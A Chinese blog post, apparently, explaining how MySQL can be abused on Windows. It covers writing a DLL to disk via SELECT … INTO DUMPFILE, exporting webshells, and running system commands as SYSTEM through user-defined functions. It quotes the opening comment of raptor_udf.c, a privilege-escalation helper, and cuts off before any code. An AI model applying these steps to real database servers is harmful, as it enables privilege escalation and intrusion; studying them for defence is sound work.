本来一直以为利用mysql就只能导出webshell,但是前一段时间无意中发现了一篇文章《Windows下通过MySQL以SYSTEM身份执行系统命令》,于是再继续搜索了一下相关的文章。
其中上传文件是利用了mysql命令“SELECT * FROM mix INTO DUMPFILE 'c://abc.dll';”(以前导文本我都只是用select * from tablename into outfile 'c://abc.txt'),想不到可以导出二进制文件。
至于执行命令,是利用了mysql的自定义过程来实现的。查了下,一个简单符合mysql的dll是如下格式的:
[code]
/*
* $Id: raptor_udf.c,v 1.1 2004/12/04 14:44:39 raptor Exp $
*
* raptor_udf.c - dynamic library for do_system() MySQL UDF
* Copyright (c) 2004 Marco Ivaldi <raptor@0xdeadbeef.info>
*
* This is an helper dynamic library for local privilege escalation through
* MySQL run with root privileges (very bad idea!). Tested on MySQL 4.0.17.
*
* Code ripped from: http://www.ngssoftware.com/papers/HackproofingMySQL.pdf
*
* "MySQL provides a mechanism by which the default set of functions can be
* expanded by means of custom written dynamic libraries containing User
* Defined Functions, or UDFs". -- Hackproofing MySQL
*
* Usage:
* $ id
* uid=500(raptor) gid=500(raptor) groups